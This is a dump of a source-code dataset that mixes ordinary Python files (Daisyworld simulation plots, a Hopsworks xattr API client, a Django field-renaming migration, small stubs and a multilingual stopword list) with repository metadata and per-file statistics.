def constant_flux_area(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt
):
# initial areas are embedded in here but should be passed in as an
# argument later if we want to change the initial conditions
# externally...
areas = {"w": 0.01, "b": 0.01} # initial conditions for area
# solve the constant flux problem:
xgens, gens = calc.update_constant_flux(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt, areas
)
# make the figure:
fig = make_subplots(specs=[[{"secondary_y": True}]])
fig.add_hrect(
xref="paper",
yref="paper",
x0=1,
x1=1.5,
y0=-15,
y1=100,
line_width=0,
fillcolor="white",
opacity=1,
)
fig.update_xaxes(showgrid=True, zeroline=False)
fig.update_yaxes(showgrid=True, zeroline=False, secondary_y=False)
fig.update_yaxes(showgrid=False, zeroline=False, secondary_y=True)
fig.add_trace(
go.Scatter(
x=gens,
y=[100 * x["Sw"] for x in xgens],
name="White daisies area",
line=dict(color="lavender", width=8),
),
secondary_y=False,
)
fig.add_trace(
go.Scatter(
x=gens,
y=[100 * x["Sb"] for x in xgens],
name="Black daisies area",
line=dict(color="black", width=3),
),
secondary_y=False,
)
fig.add_trace(
go.Scatter(
x=gens,
y=[100 * x["Su"] for x in xgens],
name="Uninhabited area",
line=dict(color="saddlebrown", width=4),
),
secondary_y=False,
)
fig.add_trace(
go.Scatter(
x=gens,
y=[x["Ap"] for x in xgens],
name="Combined albedo",
line=dict(color="royalblue", dash="dash"),
),
secondary_y=True,
)
# fig.update_layout(xaxis_title="Generation number", yaxis_title="Fractional area")
fig.update_xaxes(title_text="Simulation Time (Daisy generation #)")
fig.update_yaxes(title_text="Inhabited area [%]", secondary_y=False)
fig.update_yaxes(title_text="Albedo", secondary_y=True)
fig.update_xaxes(range=[0, len(gens)])
fig.update_yaxes(range=[0, 100], secondary_y=False) # % area
fig.update_yaxes(range=[0.35, 0.65], secondary_y=True) # albedo
fig.layout.title = "Constant flux daisy coverage"
# fig.update_layout(paper_bgcolor="black")
fig.update_layout(plot_bgcolor="silver")
return fig
def varying_solar_flux_temp(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt
):
xeq, xeqbar, _, F = calc.update_equi_flux(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt
)
# fig = go.Figure(data=go.Scatter(x=F, y=[x["Tw"] - 273.15 for x in xeq]))
##
# # fig = make_subplots(rows=1, cols=2, subplot_titles=("Plot1", "Plot2"))
# make a list of arbitrary times to plot against
times = np.arange(0, len(F) + 1, 1)
fig = make_subplots(specs=[[{"secondary_y": True}]])
fig.add_hrect(
xref="paper",
yref="paper",
x0=1,
x1=1.5,
y0=-15,
y1=100,
line_width=0,
fillcolor="white",
opacity=1,
)
# # subplot 1
fig.update_xaxes(showgrid=True, zeroline=False)
fig.update_yaxes(showgrid=True, zeroline=False, secondary_y=False)
fig.update_yaxes(showgrid=False, zeroline=False, secondary_y=True)
fig.add_trace(
go.Scatter(
x=times,
y=[Fi * Fsnom for Fi in F],
name="Solar flux (right axis)",
line=dict(color="rgba(255, 255, 0, 0.3)", width=5),
),
secondary_y=True,
)
fig.add_trace(
go.Scatter(
x=times,
y=[x["Tw"] - 273.15 for x in xeq],
name="White daisies temperature",
line=dict(color="lavender", width=7),
),
secondary_y=False,
)
# fig.add_trace(
# go.Scatter(
# x=F,
# y=[x["Tw"] - 273.15 for x in xeqinv],
# name="White daisies temperature (backwards)",
# line=dict(color="lightskyblue", dash="dot", width=5),
# ),
# )
fig.add_trace(
go.Scatter(
x=times,
y=[x["Tb"] - 273.15 for x in xeq],
name="Black daisies temperature",
line=dict(color="black", width=3),
),
secondary_y=False,
)
# fig.add_trace(
# go.Scatter(
# x=F,
# y=[x["Tb"] - 273.15 for x in xeqinv],
# name="Black daisies temperature (backwards)",
# line=dict(color="darkslategray", dash="dot", width=3),
# ),
# )
fig.add_trace(
go.Scatter(
x=times,
y=[x["Tp"] - 273.15 for x in xeq],
name="Planet temperature",
line=dict(color="seagreen", width=5, dash="dot"),
),
secondary_y=False,
)
# fig.add_trace(
# go.Scatter(
# x=F,
# y=[x["Tp"] - 273.15 for x in xeqinv],
# name="Planet temperature (backwards)",
# line=dict(color="sienna", dash="dot", width=3),
# ),
# )
fig.add_trace(
go.Scatter(
x=times,
y=[x["Tp"] - 273.15 for x in xeqbar],
name="Planet temperature (without life)",
line=dict(color="gray", dash="dash", width=3),
),
secondary_y=False,
)
fig.update_xaxes(title="Simulation Time [Myr]", range=[0, times[-1]])
fig.update_yaxes(
title="Temperature [degC]",
range=[-20, 80],
secondary_y=False,
)
fig.update_yaxes(title_text="Solar flux [Wm-2]", secondary_y=True)
fig.update_layout(title_text="Equilibrium temperature vs solar flux")
fig.update_layout(plot_bgcolor="silver")
return fig
def varying_solar_flux_area(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt
):
xeq, _, _, F = calc.update_equi_flux(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt
)
# make a list of arbitrary times to plot against
times = np.arange(0, len(F) + 1, 1)
# fig = go.Figure(data=go.Scatter(x=F, y=[x["Tw"] - 273.15 for x in xeq]))
##
# # fig = make_subplots(rows=1, cols=2, subplot_titles=("Plot1", "Plot2"))
fig = make_subplots(specs=[[{"secondary_y": True}]])
fig.add_hrect(
xref="paper",
yref="paper",
x0=1,
x1=1.5,
y0=-15,
y1=100,
line_width=0,
fillcolor="white",
opacity=1,
)
# # subplot 1
fig.update_xaxes(showgrid=True, zeroline=False)
fig.update_yaxes(showgrid=False, zeroline=False, secondary_y=True)
fig.update_yaxes(showgrid=True, zeroline=False, secondary_y=False)
fig.add_trace(
go.Scatter(
x=times,
y=[Fi * Fsnom for Fi in F],
name="Solar flux (right axis)",
line=dict(color="rgba(255, 255, 0, 0.3)", width=5),
),
secondary_y=True,
)
fig.add_trace(
go.Scatter(
x=times,
y=[100 * x["Sw"] for x in xeq],
name="White daisies area",
line=dict(color="lavender", width=7),
),
secondary_y=False,
)
# fig.add_trace(
# go.Scatter(
# x=F,
# y=[x["Sw"] for x in xeqinv],
# name="White daisies area (backwards)",
# line=dict(color="lightskyblue", dash="dot", width=5),
# ),
# )
fig.add_trace(
go.Scatter(
x=times,
y=[100 * x["Sb"] for x in xeq],
name="Black daisies area",
line=dict(color="black", width=3),
),
secondary_y=False,
)
# fig.add_trace(
# go.Scatter(
# x=F,
# y=[x["Sb"] for x in xeqinv],
# name="Black daisies area (backwards)",
# line=dict(color="darkslategray", dash="dot", width=3),
# ),
# )
fig.add_trace(
go.Scatter(
x=times,
y=[100 * x["Su"] for x in xeq],
name="Uninhabited area",
line=dict(color="saddlebrown", width=3),
),
secondary_y=False,
)
# fig.add_trace(
# go.Scatter(
# x=F,
# y=[x["Su"] for x in xeqinv],
# name="Uninhabited area (backwards)",
# line=dict(color="sienna", dash="dot", width=3),
# ),
# )
fig.update_xaxes(title="Simulation Time [Myr]", range=[0, times[-1]])
fig.update_yaxes(
title="Inhabited area [%]",
range=[0, 100],
secondary_y=False,
)
fig.update_yaxes(title_text="Solar flux [Wm-2]", secondary_y=True)
fig.update_layout(title_text="Equilibrium area vs solar flux")
fig.update_layout(plot_bgcolor="silver")
return fig
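
A hypothetical usage sketch for the plotting helpers above; the T_min/T_opt values are illustrative Kelvin bounds, not taken from the source, and the local calculations module must be importable:

# Illustrative only: the temperature bounds below are assumptions.
if __name__ == '__main__':
    albedo_fig = initialize_albedo_plot(T_min=278.15, T_opt=295.65)
    albedo_fig.show()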

[e64e9265798874238fe8da1d312e841fe0ab8876] opendart/config/__init__.py | JehunYoo/opendart | MIT | 36 bytes

from opendart.config.config import *

[e6622feade344255592fd9a7d47d6b9f1bd055ff] hops/xattr.py | robzor92/hops-util-py | Apache-2.0 | 5,732 bytes | 24 stars

"""
API for attaching, detaching, and reading extended metadata to HopsFS files/directories.
It uses the Hopsworks /xattrs REST API
"""
from hops import constants, util, hdfs
from hops.exceptions import RestAPIError
import urllib
def set_xattr(hdfs_path, xattr_name, value):
"""
Attach an extended attribute to an hdfs_path
Args:
:hdfs_path: path of a file or directory
:xattr_name: name of the extended attribute
:value: value of the extended attribute
Returns:
None
"""
value = str(value)
hdfs_path = urllib.parse.quote(hdfs._expand_path(hdfs_path))
headers = {constants.HTTP_CONFIG.HTTP_CONTENT_TYPE: constants.HTTP_CONFIG.HTTP_APPLICATION_JSON}
method = constants.HTTP_CONFIG.HTTP_PUT
resource_url = constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_REST_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_PROJECT_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
hdfs.project_id() + constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_XATTR_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
hdfs_path + constants.DELIMITERS.QUESTION_MARK_DELIMITER + constants.XATTRS.XATTRS_PARAM_NAME + \
constants.DELIMITERS.JDBC_CONNECTION_STRING_VALUE_DELIMITER + xattr_name
response = util.send_request(method, resource_url, data=value, headers=headers)
response_object = response.json()
if response.status_code >= 400:
error_code, error_msg, user_msg = util._parse_rest_error(response_object)
raise RestAPIError("Could not attach extened attributes from a path (url: {}), server response: \n " \
"HTTP code: {}, HTTP reason: {}, error code: {}, error msg: {}, user msg: {}".format(
resource_url, response.status_code, response.reason, error_code, error_msg, user_msg))
def get_xattr(hdfs_path, xattr_name=None):
"""
Get the extended attribute attached to an hdfs_path.
Args:
:hdfs_path: path of a file or directory
:xattr_name: name of the extended attribute
Returns:
A dictionary with the extended attribute(s) as key value pair(s). If the :xattr_name is None,
the API returns all associated extended attributes.
"""
hdfs_path = urllib.parse.quote(hdfs._expand_path(hdfs_path))
headers = {constants.HTTP_CONFIG.HTTP_CONTENT_TYPE: constants.HTTP_CONFIG.HTTP_APPLICATION_JSON}
method = constants.HTTP_CONFIG.HTTP_GET
resource_url = constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_REST_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_PROJECT_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
hdfs.project_id() + constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_XATTR_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
hdfs_path
if xattr_name is not None:
resource_url += constants.DELIMITERS.QUESTION_MARK_DELIMITER + constants.XATTRS.XATTRS_PARAM_NAME + \
constants.DELIMITERS.JDBC_CONNECTION_STRING_VALUE_DELIMITER + xattr_name
response = util.send_request(method, resource_url, headers=headers)
response_object = response.json()
if response.status_code >= 400:
error_code, error_msg, user_msg = util._parse_rest_error(response_object)
raise RestAPIError("Could not get extened attributes attached to a path (url: {}), server response: \n " \
"HTTP code: {}, HTTP reason: {}, error code: {}, error msg: {}, user msg: {}".format(
resource_url, response.status_code, response.reason, error_code, error_msg, user_msg))
results = {}
for item in response_object["items"]:
results[item["name"]] = item["value"]
return results
def remove_xattr(hdfs_path, xattr_name):
"""
Remove an extended attribute attached to an hdfs_path
Args:
:hdfs_path: path of a file or directory
:xattr_name: name of the extended attribute
Returns:
None
"""
hdfs_path = urllib.parse.quote(hdfs._expand_path(hdfs_path))
headers = {constants.HTTP_CONFIG.HTTP_CONTENT_TYPE: constants.HTTP_CONFIG.HTTP_APPLICATION_JSON}
method = constants.HTTP_CONFIG.HTTP_DELETE
resource_url = constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_REST_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_PROJECT_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
hdfs.project_id() + constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_XATTR_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
hdfs_path + constants.DELIMITERS.QUESTION_MARK_DELIMITER + constants.XATTRS.XATTRS_PARAM_NAME + \
constants.DELIMITERS.JDBC_CONNECTION_STRING_VALUE_DELIMITER + xattr_name
response = util.send_request(method, resource_url, headers=headers)
if response.status_code >= 400:
response_object = response.json()
error_code, error_msg, user_msg = util._parse_rest_error(response_object)
raise RestAPIError("Could not remove extened attributes from a path (url: {}), server response: \n " \
"HTTP code: {}, HTTP reason: {}, error code: {}, error msg: {}, user msg: {}".format(
resource_url, response.status_code, response.reason, error_code, error_msg, user_msg))
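
A short usage sketch for the three helpers above; the path and attribute name are illustrative, and a configured Hopsworks session is assumed:

# Hypothetical usage; assumes a live Hopsworks project and an existing file.
from hops import xattr

xattr.set_xattr('Resources/model.pb', 'training_dataset', 'td_v3')
print(xattr.get_xattr('Resources/model.pb', 'training_dataset'))
xattr.remove_xattr('Resources/model.pb', 'training_dataset')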

[0561ca0895bec1e2984e237afabbb565849b0693] room/services.py | F4ever/dots | Apache-2.0 | 140 bytes

class RoomCalculationService:
    def __init__(self, room_id):
        self.room_id = room_id

    def calculate_results(self):
        pass

[057b75bb649e28b716661271413ac2187e4d17f1] game/data/components/__init__.py | UnidayStudio/Easy-2D-Game-Engine | MIT | 48 bytes | 8 stars

from game.data.components.TestComponent import *

[058c253ae43e29116887b045dfd233f62ef4ccf0] cpab/cpaNd/model/__init__.py | freifeld/cpabDiffeo | MIT | 218 bytes | 17 stars

from _LogLikelihood import LogLikelihood
from _LogPrior import LogPrior
#from _ScaleDependentLogLikelihoodGaussian import ScaleDependentLogLikelihoodGaussian
from _ScaleDependentLogPrior import ScaleDependentLogPrior

[552db8b8886012305a174d08f78e6a22fd0ea206] tests/test_e2e.py | sasakalaba/drone-strike | Unlicense | 38 bytes

from .base import BaseTestCase
pass

[5589cd912e691b17322bc09642b9a8ec0453acc9] usaspending_api/financial_activities/migrations/0005_auto_20161004_1547.py | toolness/usaspending-api | CC0-1.0 | 8,949 bytes | 1 star

# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-10-04 19:47
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('financial_activities', '0004_merge_20160928_1603'),
]
operations = [
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='by_direct_reimbursable_fun',
new_name='by_direct_reimbursable_funding_source',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='deobligations_recov_by_pro_cpe',
new_name='deobligations_recoveries_refund_pri_program_object_class_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='drv_obli_inc_by_prog_obj_class',
new_name='drv_obligations_incurred_by_program_object_class',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='drv_obligations_undel_ord_unp',
new_name='drv_obligations_undelivered_orders_unpaid',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlay_amount_by_pro_cpe',
new_name='gross_outlay_amount_by_program_object_class_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlay_amount_by_pro_fyb',
new_name='gross_outlay_amount_by_program_object_class_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_delivered_or_cpe',
new_name='gross_outlays_delivered_orders_paid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_delivered_or_fyb',
new_name='gross_outlays_delivered_orders_paid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_undelivered_cpe',
new_name='gross_outlays_undelivered_orders_prepaid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_undelivered_fyb',
new_name='gross_outlays_undelivered_orders_prepaid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_delivered_orde_cpe',
new_name='obligations_delivered_orders_unpaid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_delivered_orde_fyb',
new_name='obligations_delivered_orders_unpaid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_incurred_by_pr_cpe',
new_name='obligations_incurred_by_program_object_class_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_undelivered_or_cpe',
new_name='obligations_undelivered_orders_unpaid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_undelivered_or_fyb',
new_name='obligations_undelivered_orders_unpaid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480100_undelivered_or_cpe',
new_name='ussgl480100_undelivered_orders_obligations_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480100_undelivered_or_fyb',
new_name='ussgl480100_undelivered_orders_obligations_unpaid_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480200_undelivered_or_cpe',
new_name='ussgl480200_undelivered_orders_oblig_prepaid_advanced_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480200_undelivered_or_fyb',
new_name='ussgl480200_undelivered_orders_oblig_prepaid_advanced_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl483100_undelivered_or_cpe',
new_name='ussgl483100_undelivered_orders_oblig_transferred_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl483200_undelivered_or_cpe',
new_name='ussgl483200_undeliv_orders_oblig_transferred_prepaid_adv_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl487100_downward_adjus_cpe',
new_name='ussgl487100_down_adj_pri_unpaid_undel_orders_oblig_recov_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl487200_downward_adjus_cpe',
new_name='ussgl487200_down_adj_pri_ppaid_undel_orders_oblig_refund_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl488100_upward_adjustm_cpe',
new_name='ussgl488100_upward_adjust_pri_undeliv_order_oblig_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl488200_upward_adjustm_cpe',
new_name='ussgl488200_up_adjust_pri_undeliv_order_oblig_ppaid_adv_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490100_delivered_orde_cpe',
new_name='ussgl490100_delivered_orders_obligations_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490100_delivered_orde_fyb',
new_name='ussgl490100_delivered_orders_obligations_unpaid_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490200_delivered_orde_cpe',
new_name='ussgl490200_delivered_orders_obligations_paid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490800_authority_outl_cpe',
new_name='ussgl490800_authority_outlayed_not_yet_disbursed_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490800_authority_outl_fyb',
new_name='ussgl490800_authority_outlayed_not_yet_disbursed_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl493100_delivered_orde_cpe',
new_name='ussgl493100_delivered_orders_oblig_transferred_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl497100_downward_adjus_cpe',
new_name='ussgl497100_down_adj_pri_unpaid_deliv_orders_oblig_recov_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl497200_downward_adjus_cpe',
new_name='ussgl497200_down_adj_pri_paid_deliv_orders_oblig_refund_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl498100_upward_adjustm_cpe',
new_name='ussgl498100_upward_adjust_pri_deliv_orders_oblig_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl498200_upward_adjustm_cpe',
new_name='ussgl498200_upward_adjust_pri_deliv_orders_oblig_paid_cpe',
),
]

[5598265430fb84db260c24576996f2ee0f789ef1] exercises/acronym/acronym.py | RJTK/python | MIT | 27 bytes | 1 star

def abbreviate():
    pass
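
The stub above is an exercise placeholder. One possible minimal implementation of the acronym kata is sketched below; the words parameter and the split rule are assumptions about the exercise spec, not the author's solution:

import re


def abbreviate(words):
    # Treat letters and apostrophes as word characters, then join the initials.
    parts = [w for w in re.split(r"[^A-Za-z']+", words) if w]
    return ''.join(w[0].upper() for w in parts)


# e.g. abbreviate('Portable Network Graphics') == 'PNG'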

[55acdcacf4ba82a80f3cb7a16e721e05d9bb07b7] knock-knock4/knockpy/__init__.py | abhinashjain/proxyfuzzer | BSD-3-Clause | 127 bytes | 1 star

import os

_ROOT = os.path.abspath(os.path.dirname(__file__))


def get_data(path):
    return os.path.join(_ROOT, 'wordlist', path)

[55bbc7c595e31e90737d59f74df6dbd5b4ab1f77] api_v2/views.py | LonelVino/club-chinois-home | MIT | 121 bytes

from django.http import JsonResponse


def names(request):
    return JsonResponse({'names': ['William', 'Rod', 'Grant']})
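
A view like names only responds once it is routed. A hypothetical urls.py entry wiring it up; the URL prefix is an assumption, not taken from the repository:

# Hypothetical routing for the view above.
from django.urls import path

from api_v2.views import names

urlpatterns = [
    path('api/v2/names/', names),
]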
| 30.25
| 63
| 0.702479
| 14
| 121
| 6.071429
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123967
| 121
| 4
| 63
| 30.25
| 0.801887
| 0
| 0
| 0
| 0
| 0
| 0.165289
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 6
| e9b3ab19d9a17d4244b5f5d4ce4ee01f10101503
| 399
| py
| Python
| multiobj_rationale/fuseprop/__init__.py
| binghong-ml/multiobj-rationale
| 735916854fba1886730ecac306dd509e930d67bd
| ["MIT"]
| 1
| 2021-08-17T00:43:11.000Z
| 2021-08-17T00:43:11.000Z
| multiobj_rationale/fuseprop/__init__.py
| binghong-ml/multiobj-rationale
| 735916854fba1886730ecac306dd509e930d67bd
| ["MIT"]
| null
| null
| null
| multiobj_rationale/fuseprop/__init__.py
| binghong-ml/multiobj-rationale
| 735916854fba1886730ecac306dd509e930d67bd
| ["MIT"]
| 1
| 2021-08-17T00:43:12.000Z
| 2021-08-17T00:43:12.000Z
|
from multiobj_rationale.fuseprop.mol_graph import MolGraph
from multiobj_rationale.fuseprop.vocab import common_atom_vocab
from multiobj_rationale.fuseprop.gnn import AtomVGNN
from multiobj_rationale.fuseprop.dataset import *
from multiobj_rationale.fuseprop.chemutils import find_clusters, random_subgraph, extract_subgraph, enum_subgraph, dual_random_subgraph, unique_rationales, merge_rationales
| 66.5
| 172
| 0.892231
| 51
| 399
| 6.666667
| 0.490196
| 0.176471
| 0.308824
| 0.426471
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065163
| 399
| 5
| 173
| 79.8
| 0.911528
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 6
| e9d8b5a198128b03e1b20f916a54a13a506755fc
| 112962
| py
| Python
| earthy/wordlist.py
| alvations/earthy
| 29a4e01050a5fd46a0ad49cd0aedfd25cd8ba787
| ["Apache-2.0"]
| 6
| 2017-05-09T18:12:00.000Z
| 2017-12-22T16:26:35.000Z
| earthy/wordlist.py
| alvations/earthy
| 29a4e01050a5fd46a0ad49cd0aedfd25cd8ba787
| ["Apache-2.0"]
| 1
| 2017-05-09T05:40:32.000Z
| 2017-05-09T05:40:32.000Z
| earthy/wordlist.py
| alvations/earthy
| 29a4e01050a5fd46a0ad49cd0aedfd25cd8ba787
| ["Apache-2.0"]
| null
| null
| null
|
# -*- coding: utf-8 -*-
import string
from charguana import get_charset
punctuations = set(list(string.punctuation) +
                   list(get_charset('Currency_Symbol')) +
                   list(get_charset('Close_Punctuation')) +
                   list(get_charset('Open_Punctuation')) +
                   list(get_charset('punctuation')))
# From https://raw.githubusercontent.com/6/stopwords-json/master/stopwords-all.json
stopwords = {"af":[u"'n",u"aan",u"af",u"al",u"as",u"baie",u"by",u"daar",u"dag",u"dat",u"die",u"dit",u"een",u"ek",u"en",u"gaan",u"gesê",u"haar",u"het",u"hom",u"hulle",u"hy",u"in",u"is",u"jou",u"jy",u"kan",u"kom",u"ma",u"maar",u"met",u"my",u"na",u"nie",u"om",u"ons",u"op",u"saam",u"sal",u"se",u"sien",u"so",u"sy",u"te",u"toe",u"uit",u"van",u"vir",u"was",u"wat",u"ʼn"],u"ha":[u"a",u"amma",u"ba",u"ban",u"ce",u"cikin",u"da",u"don",u"ga",u"in",u"ina",u"ita",u"ji",u"ka",u"ko",u"kuma",u"lokacin",u"ma",u"mai",u"na",u"ne",u"ni",u"sai",u"shi",u"su",u"suka",u"sun",u"ta",u"tafi",u"take",u"tana",u"wani",u"wannan",u"wata",u"ya",u"yake",u"yana",u"yi",u"za"],u"so":[u"aad",u"albaabkii",u"atabo",u"ay",u"ayaa",u"ayee",u"ayuu",u"dhan",u"hadana",u"in",u"inuu",u"isku",u"jiray",u"jirtay",u"ka",u"kale",u"kasoo",u"ku",u"kuu",u"lakin",u"markii",u"oo",u"si",u"soo",u"uga",u"ugu",u"uu",u"waa",u"waxa",u"waxuu"],u"st":[u"a",u"ba",u"bane",u"bona",u"e",u"ea",u"eaba",u"empa",u"ena",u"ha",u"hae",u"hape",u"ho",u"hore",u"ka",u"ke",u"la",u"le",u"li",u"me",u"mo",u"moo",u"ne",u"o",u"oa",u"re",u"sa",u"se",u"tloha",u"tsa",u"tse"],u"sw":[u"akasema",u"alikuwa",u"alisema",u"baada",u"basi",u"bila",u"cha",u"chini",u"hadi",u"hapo",u"hata",u"hivyo",u"hiyo",u"huku",u"huo",u"ili",u"ilikuwa",u"juu",u"kama",u"karibu",u"katika",u"kila",u"kima",u"kisha",u"kubwa",u"kutoka",u"kuwa",u"kwa",u"kwamba",u"kwenda",u"kwenye",u"la",u"lakini",u"mara",u"mdogo",u"mimi",u"mkubwa",u"mmoja",u"moja",u"muda",u"mwenye",u"na",u"naye",u"ndani",u"ng",u"ni",u"nini",u"nonkungu",u"pamoja",u"pia",u"sana",u"sasa",u"sauti",u"tafadhali",u"tena",u"tu",u"vile",u"wa",u"wakati",u"wake",u"walikuwa",u"wao",u"watu",u"wengine",u"wote",u"ya",u"yake",u"yangu",u"yao",u"yeye",u"yule",u"za",u"zaidi",u"zake"],u"yo":[u"a",u"an",u"bá",u"bí",u"bẹ̀rẹ̀",u"fún",u"fẹ́",u"gbogbo",u"inú",u"jù",u"jẹ",u"jẹ́",u"kan",u"kì",u"kí",u"kò",u"láti",u"lè",u"lọ",u"mi",u"mo",u"máa",u"mọ̀",u"ni",u"náà",u"ní",u"nígbà",u"nítorí",u"nǹkan",u"o",u"padà",u"pé",u"púpọ̀",u"pẹ̀lú",u"rẹ̀",u"sì",u"sí",u"sínú",u"ṣ",u"ti",u"tí",u"wà",u"wá",u"wọn",u"wọ́n",u"yìí",u"àti",u"àwọn",u"é",u"í",u"òun",u"ó",u"ń",u"ńlá",u"ṣe",u"ṣé",u"ṣùgbọ́n",u"ẹmọ́",u"ọjọ́",u"ọ̀pọ̀lọpọ̀"],u"zu":[u"futhi",u"kahle",u"kakhulu",u"kanye",u"khona",u"kodwa",u"kungani",u"kusho",u"la",u"lakhe",u"lapho",u"mina",u"ngesikhathi",u"nje",u"phansi",u"phezulu",u"u",u"ukuba",u"ukuthi",u"ukuze",u"uma",u"wahamba",u"wakhe",u"wami",u"wase",u"wathi",u"yakhe",u"zakhe",u"zonke"],u"da":[u"af",u"alle",u"andet",u"andre",u"at",u"begge",u"da",u"de",u"den",u"denne",u"der",u"deres",u"det",u"dette",u"dig",u"din",u"dog",u"du",u"ej",u"eller",u"en",u"end",u"ene",u"eneste",u"enhver",u"et",u"fem",u"fire",u"flere",u"fleste",u"for",u"fordi",u"forrige",u"fra",u"få",u"før",u"god",u"han",u"hans",u"har",u"hendes",u"her",u"hun",u"hvad",u"hvem",u"hver",u"hvilken",u"hvis",u"hvor",u"hvordan",u"hvorfor",u"hvornår",u"i",u"ikke",u"ind",u"ingen",u"intet",u"jeg",u"jeres",u"kan",u"kom",u"kommer",u"lav",u"lid